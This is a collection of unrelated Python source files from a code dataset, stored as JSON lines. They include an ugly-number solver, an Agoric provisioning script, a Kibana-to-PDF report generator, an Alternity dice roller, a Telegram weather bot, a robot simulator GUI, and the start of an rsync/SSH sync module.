+{"seq_id":"9356551","text":"#这一类问题属于寻找第n个符合某一条件的数,看到这种问题会有两种思考方式:\n#第一种:从第一个数开始判断,直到找到n个符合条件的数,\n#第二种:第k+1个满足条件的数,是不是可以由之前的k个已经确定满足条件的数求出\n#第一种复杂度较高\n#采用第二种方法实现:每一个新丑数都由已经求出的丑数乘2或乘3或乘5得到,\n#刚开始只有一个丑数1,那么由丑数1可以生成三个丑数1*2,1*3,1*5\n#新生成的三个丑数2,3,5最小的是2,那么由丑数2又可以生成三个丑数2*2,2*3,2*5,,那么\n#此时一共有2,3,5,4,6,10六个丑数\n#利用三个列表t2,t3,t5\n#每次生成一个丑数A都,将A*2添加到t2,将A*3添加到t3,,将A*5添加到t5,\n#每个列表的第一个元素代表\n\nclass Solution:\n def GetUglyNumber_Solution(self, n):\n if n==1:\n return n\n t2=[2]\n t3=[3]\n t5=[5]\n for i in range(2,n+1):\n minD=min(t2[0],min(t3[0],t5[0]))\n work=1\n if minD==t2[0]:\n t2.append(t2[0]*2)\n t3.append(t2[0]*3)\n t5.append(t2[0]*5)\n res=t2[0]\n work=0\n del t2[0]\n if minD==t3[0]:\n if work:\n t2.append(t3[0] * 2)\n t3.append(t3[0] * 3)\n t5.append(t3[0] * 5)\n res=t3[0]\n work=0\n del t3[0]\n if minD==t5[0]:\n if work:\n t2.append(t5[0] * 2)\n t3.append(t5[0] * 3)\n t5.append(t5[0] * 5)\n res=t5[0]\n del t5[0]\n return res\n\nSolution().GetUglyNumber_Solution(1)\n\n\n\n\n","sub_path":"newcode_GetUglyNumber_Solution.py","file_name":"newcode_GetUglyNumber_Solution.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"6597917","text":"from twisted.internet.task import react\nfrom twisted.internet import endpoints, defer\nfrom twisted.python import usage\nimport wormhole\nimport treq\nimport json\nimport os.path\nimport shutil\nimport subprocess\nimport sys\nimport os\nimport urllib.request\n\nMAILBOX_URL = u\"ws://relay.magic-wormhole.io:4000/v1\"\n#MAILBOX_URL = u\"ws://10.0.2.24:4000/v1\"\nAPPID = u\"agoric.com/ag-testnet1/provisioning-tool\"\nNETWORK_CONFIG = \"https://testnet.agoric.com/network-config\"\n\n# Locate the ag-solo binary.\n# Look up until we find a different bin directory.\ncandidate = os.path.normpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..'))\nAG_SOLO = os.path.join(candidate, 'bin', 'ag-solo')\nwhile not os.path.exists(AG_SOLO):\n next_candidate = os.path.dirname(candidate)\n if next_candidate == candidate:\n AG_SOLO = 'ag-solo'\n break\n candidate = next_candidate\n AG_SOLO = os.path.join(candidate, 'bin', 'ag-solo')\n\nclass Options(usage.Options):\n optParameters = [\n [\"webhost\", \"h\", \"127.0.0.1\", \"client-visible HTTP listening address\"],\n [\"webport\", \"p\", \"8000\", \"client-visible HTTP listening port\"],\n [\"netconfig\", None, NETWORK_CONFIG, \"website for network config\"]\n ]\n def parseArgs(self, basedir=os.environ.get('AG_SOLO_BASEDIR', 'agoric')):\n self['basedir'] = os.environ['AG_SOLO_BASEDIR'] = basedir\n\n\ndef setIngressAndRestart(sm):\n subprocess.run([AG_SOLO, 'set-gci-ingress', '--chainID=%s' % sm['chainName'], sm['gci'], *sm['rpcAddrs']], check=True)\n os.execvp(AG_SOLO, [AG_SOLO, 'start', '--role=client'])\n\n@defer.inlineCallbacks\ndef run_client(reactor, o, pubkey):\n w = wormhole.create(APPID, MAILBOX_URL, reactor)\n wormhole.input_with_completion(\"Provisioning code: \", w.input_code(), reactor)\n cm = json.dumps({\n \"pubkey\": pubkey,\n })\n w.send_message(cm.encode(\"utf-8\"))\n server_message = yield w.get_message()\n sm = json.loads(server_message.decode(\"utf-8\"))\n print(\"server message is\", sm)\n yield w.close()\n\n if not sm['ok']:\n print(\"error from server:\", sm['error'])\n return\n\n BASEDIR = o['basedir']\n setIngressAndRestart(sm)\n\ndef doInit(o):\n BASEDIR = o['basedir']\n # run 'ag-solo init BASEDIR'\n subprocess.run([AG_SOLO, 'init', BASEDIR, '--webhost=' + o['webhost'], '--webport=' + o['webport']], check=True)\n\ndef main():\n o = Options()\n o.parseOptions()\n pkeyFile = os.path.join(o['basedir'], 'ag-cosmos-helper-address')\n # If the public key file does not exist, just init and run.\n if not os.path.exists(pkeyFile):\n doInit(o)\n\n # read the pubkey out of BASEDIR/ag-cosmos-helper-address\n pkfile = open(pkeyFile)\n pubkey = pkfile.read()\n pkfile.close()\n pubkey = pubkey.strip()\n react(run_client, (o,pubkey))\n sys.exit(1)\n\n yesno = input('Type \"yes\" to reset state from ' + o['netconfig'] + ', anything else cancels: ')\n if yesno.strip() != 'yes':\n print('Cancelling!')\n sys.exit(1)\n\n # Blow away everything except the key file and state dir.\n helperStateDir = os.path.join(o['basedir'], 'ag-cosmos-helper-statedir')\n for name in os.listdir(o['basedir']):\n p = os.path.join(o['basedir'], name)\n if p == pkeyFile or p == helperStateDir:\n continue\n if os.path.isdir(p) and not os.path.islink(p):\n shutil.rmtree(p)\n else:\n os.remove(p)\n\n # Upgrade the ag-solo files.\n doInit(o)\n\n # Download the netconfig.\n print('downloading netconfig from', o['netconfig'])\n resp = urllib.request.urlopen(o['netconfig'])\n encoding = resp.headers.get_content_charset('utf-8')\n decoded = resp.read().decode(encoding)\n netconfig = json.loads(decoded)\n\n setIngressAndRestart(netconfig)\n sys.exit(1)\n","sub_path":"setup-solo/src/ag_setup_solo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"488412748","text":"# -*- coding: utf-8 -*-\n#USING UTF-8\n\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom PIL import Image\nfrom io import BytesIO\nimport tempfile\nfrom fpdf import FPDF\nimport string\nimport random\n\ntitle = 'Network Report'\n\n# PDF Width = 210\nclass PDF(FPDF):\n def header(self):\n # Logo\n self.image('logo-zyxel.png', 10, 7, 20)\n # Arial bold 15\n self.set_font('Arial', 'B', 20)\n # Move to the right\n # Title\n w = self.get_string_width(title) + 6\n self.set_x((210 - w) / 2)\n self.cell(w, 1, title, 0, 0, 'C')\n self.line(10, self.get_y()+5, 200, self.get_y()+5)\n # Line break\n self.ln(10)\n\n # Page footer\n def footer(self):\n # Position at 1.5 cm from bottom\n self.set_y(-15)\n # Arial italic 8\n self.set_font('Arial', 'I', 8)\n # Page number\n self.cell(0, 10, 'Page ' + str(self.page_no()) + '/{nb}', 0, 0, 'C')\n\n\ndef id_generator(size=6, chars=string.ascii_uppercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef pdf_generator(url):\n print(url)\n pdf = PDF()\n pdf.add_font('notosanscjktc', '', 'NotoSansCJKtc-Regular.ttf', uni=True)\n img_path = 'report.png'\n pdf_path = \"report.pdf\"\n\n chrome_options = Options()\n chrome_options.add_argument('--headless')\n # chrome_options.binary_location = 'chromedriver.exe'\n driver = webdriver.Chrome(options=chrome_options)\n try:\n driver.get(url)\n wait = WebDriverWait(driver, 1000)\n wait.until(lambda driver: driver.current_url != url)\n wait.until(lambda driver: driver.find_element_by_tag_name('svg'))\n total_height = driver.execute_script(\"return document.body.parentNode.scrollHeight\")\n driver.set_window_size(1000, int(total_height))\n sleep(5)\n js = '''\n var x = document.getElementsByClassName('visualize-chart');\n var y = document.getElementsByClassName('panel-title');\n for(var i = x.length-1; i >= 0; --i){\n if(x[i].offsetTop > 10){\n x[i].remove();\n }\n }\n var arr = [];\n for(var i = 0;i < x.length; i++){\n dict = {};\n if (x[i].getElementsByClassName('visualize-error').length > 0) {\n continue;\n }\n if (y[i].getElementsByClassName('table-vis-error').length > 0) {\n continue;\n }\n dict['title'] = y[i].innerText; \n dict['rect'] = x[i].getBoundingClientRect();\n arr.push(dict);\n }\n return arr;\n '''\n test = driver.execute_script(js)\n sleep(10)\n png = driver.get_screenshot_as_png()\n\n driver.quit()\n except Exception:\n driver.quit()\n return 'Failed'\n # Instantiation of inherited class\n pdf.alias_nb_pages()\n pdf.add_page()\n pdf.set_font('notosanscjktc', '', 12)\n with tempfile.TemporaryDirectory() as tmp_dir:\n print(tmp_dir)\n for i in range(len(test)):\n im = Image.open(BytesIO(png))\n # defines crop points\n im = im.crop((test[i]['rect']['left'], test[i]['rect']['top'], test[i]['rect']['right'], test[i]['rect']['bottom']))\n im.save('{}/{}-{}.png'.format(tmp_dir, i, test[i]['title']))\n pdf.cell(0, 10, test[i]['title'], 0, 1)\n pdf.image('{}/{}-{}.png'.format(tmp_dir, i, test[i]['title']), w=190)\n pdf.ln(4)\n\n pdf_name = 'report_{}.pdf'.format(id_generator())\n pdf.output(dest='F', name=pdf_name)\n return pdf_name\n","sub_path":"kibana proj/report/report/app/render_pdf/htmltopdf.py","file_name":"htmltopdf.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"202381428","text":"# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.\n# --\n#\n# File: Alternity.py\n# Version:\n# $Id: Alternity.py,v .1 JEC (cchriss@thecastle.com)\n#\n# Description: Alternity die roller based on Posterboy's D20 Dieroller\n#\n# Changelog:\n#\n# v.1 original release JEC\n#\n# Traipse Release: \n# The changes made in the Traipe release are intended to create a more direct connection\n# between the source and the intrepretor. IF, ELIF statements have been replaced with dictionaries,\n# unused objects have been replace with re-usable objects, and the code has been condensed.\n#\n# SEG: JAN 24 2010 - v.1.4 O'Flux Release:\n# Edits & Additions: fixed a few minor bugs; Damage roll & Display Issues.\n# Added Secondary Damage Calculation and Display. Fix all errors.\n# Added proper results for Critcal Successes with failure ==> final Result Ordinary Success\n# Removed reduntent Method to make parent class true with all others working as child.\n# Made all special output same colour codes font size. Cleaned out old commented lines.\n# Tested for Traipse on Win 7\n#\n# Skill Check Example:\n# [1d20.sk(12,-2)]\n# OUTPUT Example:\n# => [6,-3] = (3) AMAZING Success\n#\n# Pistol, Laser; 0 step -- Attack Example:\n# [1d20.at(12,0,(1d4+1,\"w\"),(1d6+1,\"w\"),(1d4,\"m\"))]\n# OUTPUT Example:\n# => [1,0] = (1) CRITICAL SUCCESS AMAZING HIT\n# ===> Damage [4] = (4) mortal ======> Secondary Damage (2) stun / (2) wound\n#\n# Action Check Example:\n# [1d20.ac(14,-1)]\n# OUTPUT Example:\n# => ACTION CHECK : [18,-3] = (15) Marginal failure\n# -1 Step make up bonus next Action Check\n#\n#\n\nimport re\n\nfrom std import std\nfrom time import time, clock\nfrom orpg.dieroller.base import di, die_base, die_rollers\n\n##from orpg.tools.orpg_log import debug\n\n\n__version__ = \"$Id: alternity.py,v 0.1 2003/01/02 12:00:00 cchriss Exp $\"\n\n# Alternity stands for \"Alternity system\" 20 sided die plus mods\n\nclass alternity(std):\n name = \"alternity\" # ADDED by SEG Nov 2009 ***\n \n def __init__(self,source=[]):\n std.__init__(self,source)\n\n # these methods return new die objects for specific options\n def sk(self,score,mod):\n return sk(self,score,mod)\n\n def at(self,score,mod,dmgo,dmgg,dmga):\n return at(self,score,mod,dmgo,dmgg,dmga)\n\n def ac(self,score,mod):\n return ac(self,score,mod)\n\ndie_rollers.register(alternity)\n\nclass sk(std):\n def __init__(self,source=[],sc=\"10/5/2\",mod=0):\n std.__init__(self,source)\n m = re.match( r\"\\d+\", str(sc) )\n self.score = int( m.group(0) )\n self.mod = mod\n\n def getMod(self,mod=0):\n m=0\n mods = { -4: -di(12), -3: -di(8), -2: -di(6), -1: -di(4), 1: di(4),\n 2: di(6), 3: di(8), 4: di(12), 5: di(20)} # SEG fix 1: di(4) #\n if mod in mods.keys(): m = mods[mod].value\n elif mod <= -5: m=-di(20).value\n elif mod == 6: m=di(20).value + di(20).value\n elif mod >= 7: m=di(20).value + di(20).value + di(20).value\n return m\n\n def getRolLStr(self):\n myStr = \"[\" + str(self.data[0])\n self.d20 = self.sum()\n self.amod = self.getMod(self.mod)\n\n## varN = \"self.amod\"\n## debug(varN)\n## debug(self.amod) ## seg added debug output\n \n self.dieRoll = self.d20 + self.amod\n for a in self.data[1:]:\n myStr += \",\"\n myStr += str(a)\n myStr += \",\" + str(self.amod) + \"] = (\" + str(self.dieRoll) + \")\"\n if ( self.dieRoll <= self.score / 4 ): self.success = 'A'\n elif ( self.dieRoll <= self.score / 2 ): self.success = 'G'\n elif ( self.dieRoll <= self.score ): self.success = 'O'\n else: self.success = 'F'\n return myStr\n\n def __str__(self):\n myStr = self.getRolLStr()\n\n## varN = \"myStr\"\n## debug(varN)\n## debug(myStr) ## seg added debug output\n\n successes = {'CS': \" CRITICAL SUCCESS\",\n 'CF': \" CRITICAL FAILURE\",\n 'A': \" AMAZING Success\",\n 'G': \" Good Success\",\n 'O': \" Ordinary Success\",\n 'F': \" failure\"}\n\n if ( self.d20 == 1 ): myStr += successes['CS'] # SEG Dec 19 2009\n myStr += successes[self.success]\n if ( self.d20 == 1 ) and (self.success == 'F') :\n myStr += \" final result ==> \"\n myStr += successes['O'] # SEG JAN 23 2010\n return myStr\n\nclass at(sk):\n ## Traipse Usage: The source I received had the damage rolls like this 1d6s, with the damage type a\n ## letter that could be sliced from the roll. However, the roll is parsed before the letter can be\n ## sliced from it, and with the letter attached it created an error.\n ##\n ## The Traipse method puts the damage type and the damage roll into a Tuple, ie (1d6, 's').\n ## When using this method you must include single or double quoutes around the damage type or the\n ## software will treat it as an object.\n\n def __init__(self,source=[],sc=10, mod=0, dmgo=\"(1d6, 's')\",dmgg=\"(1d6, 'w')\",dmga=\"(1d6, 'm')\"):\n sk.__init__(self,source,sc,mod)\n self.dmgo = dmgo\n self.dmgg = dmgg\n self.dmga = dmga\n\n def getdmg(self,dmgroll):\n astr = \"===> Damage \"\n droll = str(dmgroll[0])\n xyz = droll.split('(')\n secD = (int(xyz[1][:-1])/2) ## SEG* Calculate Secondary Damage\n\n## varN = \"secD\"\n## debug(varN)\n## debug(secD) ## seg added debug output\n\n dtype = dmgroll[1]\n astr += droll\n if dtype==\"s\": astr += \" stun \"\n elif dtype==\"w\":\n astr += \" wound\"+\" ======> Secondary Damage (\"+str(secD) \\\n +\") stun \" # SEG* Display Secondary Damage\n elif dtype==\"m\":\n astr += \" mortal\"+\" ======> Secondary Damage (\"+str(secD) \\\n +\") stun\"+\" / (\"+str(secD)+\") wound \" # SEG* Display Secondary Damage\n return astr\n\n def __str__(self):\n myStr = self.getRolLStr()\n\n## varN = \"myStr\"\n## debug(varN)\n## debug(myStr) ## seg added debug output\n \n successes = {'CS': \" CRITICAL SUCCESS\",\n 'CF': \" CRITICAL FAILURE\",\n 'A': \" AMAZING HIT \",\n 'G': \" Good HIT \",\n 'O': \" Ordinary HIT \",\n 'F': \" miss\"}\n if ( self.d20 == 1 ):\n myStr += successes['CS'] # SEG Dec 19 2009\n\n if ( self.d20 == 1 ) and (self.success == 'F') :\n myStr += successes['F'] # SEG JAN 23 2010\n myStr += \" final result ==> \"\n self.success = 'O'\n\n myStr += successes[self.success]\n if self.success == 'A': myStr += self.getdmg(self.dmga)\n elif self.success == 'G': myStr += self.getdmg(self.dmgg)\n elif self.success == 'O': myStr += self.getdmg(self.dmgo)\n return myStr\n\nclass ac(sk):\n def __init__(self,source=[],sc=10,mod=0):\n sk.__init__(self,source,sc,mod)\n\n def __str__(self):\n myStr = self.getRolLStr()\n\n## varN = \"myStr\"\n## debug(varN)\n## debug(myStr) ## seg added debug output\n \n myStr = \" ACTION CHECK : \"+myStr\n successes = {'CS': \" CRITICAL SUCCESS\",\n 'CF': \" CRITICAL FAILURE\",\n 'A': \" AMAZING Success\",\n 'G': \" Good Success\",\n 'O': \" Ordinary Success\",\n 'F': \" Marginal failure\"}\n if self.d20 == 1: \n myStr += successes['CS']\n myStr += ' (' +successes[self.success]+ ' )'\n elif self.d20 == 20: \n myStr += successes['CF']\n myStr += ' (' +successes[self.success]+ ' )'\n else: myStr += successes[self.success]\n return myStr\n\n","sub_path":"data/python/e763e84d9a686ca30a10774db232acf5_alternity.py","file_name":"e763e84d9a686ca30a10774db232acf5_alternity.py","file_ext":"py","file_size_in_byte":9286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"137912379","text":"import telebot\nimport logging\nfrom telebot import types\nimport requests\n\nbot = telebot.TeleBot(API_TOKEN_BOT, threaded=False)\n\nlogger = telebot.logger\ntelebot.logger.setLevel(logging.DEBUG) # Outputs debug messages to console.\nAPI_TOKEN = ''\n\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n bot.reply_to(message, \"Дороу\")\n\n\n@bot.message_handler(commands=['help'])\ndef send_welcome(message):\n bot.reply_to(message, \"Бог в помощь\")\n\n\n@bot.message_handler(commands=['location'])\ndef location(message):\n keyboard = types.ReplyKeyboardMarkup(row_width=1, resize_keyboard=True)\n button_geo = types.KeyboardButton(text=\"Send de way\", request_location=True)\n keyboard.add(button_geo)\n bot.send_message(message.chat.id, \"Do u now de way\", reply_markup=keyboard)\n\n\n@bot.message_handler(content_types=[\"location\"])\ndef location(message):\n url = requests.get(f'http://api.openweathermap.org/data/2.5/weather?'\n f'lat={message.location.latitude}&lon={message.location.longitude}&appid={API_TOKEN}').json()\n bot.send_message(message.chat.id, text=f'{url.get(\"name\")}, {url.get(\"main\").get(\"temp\")}')\n\n #f'{url.get(\"name\")}, {url.get(\"main\").get(\"temp\")}\n\n\n@bot.message_handler(func=lambda message: True)\ndef echo_message(message):\n bot.reply_to(message, message.text)\n\n\nbot.infinity_polling(True)\n","sub_path":"PoC_bot.py","file_name":"PoC_bot.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"234711072","text":"'''\n/* =======================================================================\n (c) 2015, Kre8 Technology, Inc.\n\n PROPRIETARY and CONFIDENTIAL\n\n This file contains source code that constitutes proprietary and\n confidential information created by David Zhu\n\n Kre8 Technology retains the title, ownership and intellectual property rights\n in and to the Software and all subsequent copies regardless of the\n form or media. Copying or distributing any portion of this file\n without the written permission of Kre8 Technology is prohibited.\n\n Use of this code is governed by the license agreement,\n confidentiality agreement, and/or other agreement under which it\n was distributed. When conflicts or ambiguities exist between this\n header and the written agreement, the agreement supersedes this file.\n ========================================================================*/\n'''\n\nimport Tkinter as tk\nimport time \nimport math\n\nclass virtual_robot:\n def __init__(self):\n #self.robot = None\n self.l = 20*math.sqrt(2) # half diagonal - robot is 40 mm square\n self.x = 0 # x coordinate\n self.y = 0 # y coordinate\n self.a = 0 # angle of the robot, 0 when aligned with verticle axis\n self.dist_l = False\n self.dist_r = False #distance\n self.floor_l = False \n self.floor_r = False \n self.sl = 0 # speed of left wheel\n self.sr = 0 # speed of right wheel\n self.t = 0 # last update time\n\n def reset_robot(self):\n self.x = 0 # x coordinate\n self.y = 0 # y coordinate\n self.a = 0 # angle of the robot, 0 when aligned with verticle axis\n self.dist_l = False\n self.dist_r = False #\n self.floor_l = False \n self.floor_r = False \n self.sl = 0 # speed of left wheel\n self.sr = 0 # speed of right wheel\n self.t = 0 # last update time\n\n def set_robot_speed(self, w_l, w_r):\n self.sl = w_l\n self.sr = w_r\n\n def set_robot_pose(self, a, x, y):\n self.a = a\n self.x = x\n self.y = y\n\n def set_robot_prox_dist(self, dist_l, dist_r):\n self.dist_l = dist_l\n self.dist_r = dist_r\n\n def set_robot_floor (self, floor_l, floor_r):\n self.floor_l = floor_l\n self.floor_r = floor_r\n\nclass virtual_world:\n def __init__(self):\n self.real_robot = False\n self.vrobot = virtual_robot()\n self.canvas = None\n self.canvas_width = 0\n self.canvas_height = 0\n self.area = []\n self.map = []\n self.cobs = []\n self.f_cell_list = []\n self.goal_list = []\n self.goal_list_index = 0\n self.goal_t = \"None\"\n self.goal_x = 0\n self.goal_y = 0\n self.goal_a = 0\n self.goal_achieved = True\n self.trace = False #leave trace of robot\n self.prox_dots = False # draw obstacles detected as dots on map\n self.floor_dots = False\n self.localize = False\n self.glocalize = False\n \n def add_obstacle(self,rect):\n self.map.append(rect)\n\n def draw_map(self):\n canvas_width = self.canvas_width\n canvas_height = self.canvas_height\n for rect in self.map:\n x1 = canvas_width + rect[0]\n y1= canvas_height - rect[1]\n x2= canvas_width + rect[2]\n y2 = canvas_height - rect[3]\n self.canvas.create_rectangle([x1,y1,x2,y2], outline=\"grey\", fill=\"grey\")\n for cobs in self.cobs:\n x1 = canvas_width + cobs[0]\n y1= canvas_height - cobs[1]\n x2= canvas_width + cobs[2]\n y2 = canvas_height - cobs[3]\n #self.canvas.create_rectangle([x1,y1,x2,y2], fill=None)\n\n def draw_robot(self):\n canvas_width = self.canvas_width\n canvas_height = self.canvas_height\n pi4 = 3.1415 / 4 # quarter pi\n vrobot = self.vrobot\n a1 = vrobot.a + pi4\n a2 = vrobot.a + 3*pi4\n a3 = vrobot.a + 5*pi4\n a4 = vrobot.a + 7*pi4\n\n x1 = canvas_width + vrobot.l * math.sin(a1) + vrobot.x\n x2 = canvas_width + vrobot.l * math.sin(a2) + vrobot.x\n x3 = canvas_width + vrobot.l * math.sin(a3) + vrobot.x \n x4 = canvas_width + vrobot.l * math.sin(a4) + vrobot.x\n\n y1 = canvas_height - vrobot.l * math.cos(a1) - vrobot.y\n y2 = canvas_height - vrobot.l * math.cos(a2) - vrobot.y\n y3 = canvas_height - vrobot.l * math.cos(a3) - vrobot.y\n y4 = canvas_height - vrobot.l * math.cos(a4) - vrobot.y\n\n points = (x1,y1,x2,y2,x3,y3,x4,y4)\n poly_id = vrobot.poly_id\n self.canvas.coords(poly_id, points) \n\n if self.trace:\n pi3 = 3.1415/3\n a1 = vrobot.a\n a2 = a1 + 2*pi3\n a3 = a1 + 4*pi3\n x1 = canvas_width + 3 * math.sin(a1) + vrobot.x\n x2 = canvas_width + 3 * math.sin(a2) + vrobot.x\n x3 = canvas_width + 3 * math.sin(a3) + vrobot.x \n y1 = canvas_height - 3 * math.cos(a1) - vrobot.y\n y2 = canvas_height - 3 * math.cos(a2) - vrobot.y\n y3 = canvas_height - 3 * math.cos(a3) - vrobot.y\n self.canvas.create_polygon([x1,y1,x2,y2,x3,y3], outline=\"blue\")\n\n def radial_intersect(self, a_r, x_e, y_e):\n for obs in self.map:\n x1 = obs[0]\n y1 = obs[1]\n x2 = obs[2]\n y2 = obs[3]\n # first quadron\n if (a_r >= 0) and (a_r < 3.1415/2): \n #print \"radial intersect: \", x_e, y_e\n if (y_e < y1):\n x_i = x_e + math.tan(a_r) * (y1 - y_e)\n y_i = y1\n if (x_i > x1 and x_i < x2):\n return [x_i, y_i, 1] # 1 indicating intersecting a bottom edge of obs\n if (x_e < x1):\n x_i = x1\n y_i = y_e + math.tan(3.1415/2 - a_r) * (x1 - x_e)\n if (y_i > y1 and y_i < y2):\n return [x_i, y_i, 2] # left edge of obs\n # second quadron\n if (a_r >= 3.1415/2) and (a_r < 3.1415): \n if (y_e > y2):\n x_i = x_e + math.tan(a_r) * (y2 - y_e)\n y_i = y2\n if (x_i > x1 and x_i < x2):\n return [x_i, y_i, 3] # top edge\n if (x_e < x1):\n x_i = x1\n y_i = y_e + math.tan(3.1415/2 - a_r) * (x1 - x_e)\n if (y_i > y1 and y_i < y2):\n return [x_i, y_i, 2] #left edge\n # third quadron\n if (a_r >= 3.1415) and (a_r < 1.5*3.1415): \n if (y_e > y2):\n x_i = x_e + math.tan(a_r) * (y2 - y_e)\n y_i = y2\n if (x_i > x1 and x_i < x2):\n return [x_i, y_i, 3] #top edge\n if (x_e > x2):\n x_i = x2\n y_i = y_e + math.tan(3.1415/2 - a_r) * (x2 - x_e)\n if (y_i > y1 and y_i < y2):\n return [x_i, y_i, 4] # right edge\n # fourth quadron\n if (a_r >= 1.5*3.1415) and (a_r < 6.283): \n if (y_e < y1):\n x_i = x_e + math.tan(a_r) * (y1 - y_e)\n y_i = y1\n if (x_i > x1 and x_i < x2):\n return [x_i, y_i, 1] # bottom edge\n if (x_e > x2):\n x_i = x2\n y_i = y_e + math.tan(3.1415/2 - a_r) * (x2 - x_e)\n if (y_i > y1 and y_i < y2):\n return [x_i, y_i, 4] # riht edge\n return False\n\n def get_vrobot_prox(self, side):\n vrobot = self.vrobot\n\n a_r = vrobot.a # robot's orientation, same as sensor orientation\n if (a_r < 0):\n a_r += 6.283\n if (side == \"left\"):\n a_e = vrobot.a - 3.1415/4.5 #emitter location\n else:\n a_e = vrobot.a + 3.1415/4.5 #emitter location\n x_e = (vrobot.l-2) * math.sin(a_e) + vrobot.x #emiter pos of left sensor\n y_e = (vrobot.l-2) * math.cos(a_e) + vrobot.y #emiter pos of right sensor\n\n intersection = self.radial_intersect(a_r, x_e, y_e)\n if intersection:\n x_i = intersection[0]\n y_i = intersection[1]\n if (side == \"left\"):\n vrobot.dist_l = math.sqrt((y_i-y_e)*(y_i-y_e) + (x_i-x_e)*(x_i-x_e))\n if vrobot.dist_l > 120:\n vrobot.dist_l = False\n return vrobot.dist_l\n else :\n vrobot.dist_r = math.sqrt((y_i-y_e)*(y_i-y_e) + (x_i-x_e)*(x_i-x_e))\n if vrobot.dist_r > 120:\n vrobot.dist_r = False\n return vrobot.dist_r\n #print \"sim: \", vrobot.dist_l, vrobot.dist_r\n else:\n if (side == \"left\"):\n vrobot.dist_l = False\n return False\n else:\n vrobot.dist_r = False\n return False\n\n def draw_prox(self, side):\n canvas_width = self.canvas_width\n canvas_height = self.canvas_height\n vrobot = self.vrobot\n if (side == \"left\"):\n a_e = vrobot.a - 3.1415/5 #emitter location\n prox_dis = vrobot.dist_l\n prox_l_id = vrobot.prox_l_id\n else:\n a_e = vrobot.a + 3.1415/5 #emitter location\n prox_dis = vrobot.dist_r\n prox_l_id = vrobot.prox_r_id\n if (prox_dis):\n x_e = (vrobot.l-4) * math.sin(a_e) + vrobot.x #emiter pos of left sensor\n y_e = (vrobot.l-4) * math.cos(a_e) + vrobot.y #emiter pos of right sensor\n x_p = prox_dis * math.sin(vrobot.a) + x_e\n y_p = prox_dis * math.cos(vrobot.a) + y_e\n if (self.prox_dots):\n self.canvas.create_oval(canvas_width+x_p-1, canvas_height-y_p-1, canvas_width+x_p+1, canvas_height-y_p+1, outline='red')\n point_list = (canvas_width+x_e, canvas_height-y_e, canvas_width+x_p, canvas_height-y_p)\n self.canvas.coords(prox_l_id, point_list)\n else:\n point_list = (0,0,0,0)\n self.canvas.coords(prox_l_id, point_list)\n\n def draw_floor(self, side):\n canvas_width = self.canvas_width\n canvas_height = self.canvas_height\n vrobot = self.vrobot\n if (side == \"left\"):\n border = vrobot.floor_l\n floor_id = vrobot.floor_l_id\n a = vrobot.a - 3.1415/7 #rough position of the left floor sensor\n else:\n border = vrobot.floor_r\n floor_id = vrobot.floor_r_id\n a = vrobot.a + 3.1415/7 #rough position of the left floor sensor \n x_f = (vrobot.l - 12) * math.sin(a) + vrobot.x\n y_f = (vrobot.l - 12) * math.cos(a) + vrobot.y\n points = (canvas_width+x_f-2, canvas_height-y_f-2, canvas_width+x_f+2, canvas_height-y_f+2)\n self.canvas.coords(floor_id, points)\n if (border): \n self.canvas.itemconfig(floor_id, outline = \"black\", fill=\"black\")\n if (self.floor_dots):\n self.canvas.create_oval(canvas_width+x_f-2, canvas_height-y_f-2, canvas_width+x_f+2, canvas_height-y_f+2, fill='black')\n else:\n self.canvas.itemconfig(floor_id, outline = \"white\", fill=\"white\")\n","sub_path":"HamsterLab7/tk_hamster_GUI_Sim.py","file_name":"tk_hamster_GUI_Sim.py","file_ext":"py","file_size_in_byte":11393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"314360510","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nRemote interfaces\n\nFor now, it is *just* SSH + rsync to work within the subprocess on Unix/Linux\n(macOS is Unix). It is separated to more easily make other backends\n\nAn interface must have the following methods and behaviors from \n'remote_interface_base'. Note that optional methods have a pass but the \nrequired ones will raise a NotImplementedError\n\"\"\"\nfrom __future__ import division, print_function, unicode_literals\n\nimport subprocess\nimport re\nimport sys\nimport os\nimport random\nimport string\nimport json\nimport zlib\nimport shlex\nimport tempfile\n\nfrom io import open\n\nif sys.version_info[0] > 2:\n xrange = range\n unicode = str\n\nfrom . import utils\n\nclass remote_interface_base(object):\n def __init__(self,config,log=None):\n \"\"\"\n * Just pass it the configuration file\n * Optionally, pass it the log object to modify\n \"\"\"\n raise NotImplementedError()\n def file_list(self,attributes,empty):\n \"\"\"\n * Attributes are a list of requested attributes but generally, more\n should be returned in case attributes change.\n * follow the `empty` settings of PFSwalk -- if applicable\n 'store': stores a list of empty directories\n 'remove': Deletes all empty directories if (and only if) they \n were *not* empty before. Also removes stored list\n 'reset': Removes stored list\n \"\"\"\n raise NotImplementedError()\n \n def apply_queue(self,queue,force):\n \"\"\"\n * queue is the action queue that takes the following form\n * {'backup':[file_path]} # Make a copy to the backup\n * {'move': [src,dest]} # Move the file\n * {'delete': [file_path]} # Move the file into the backup. Essentially a backup\n * Force tells it to allow a file to be moved into another\n\n Notes:\n * If a file is to be moved into another, it should not work unless\n force is set. If force it set, it should backup the file as per\n config.backup\n * Delete should backup first if set config.backup 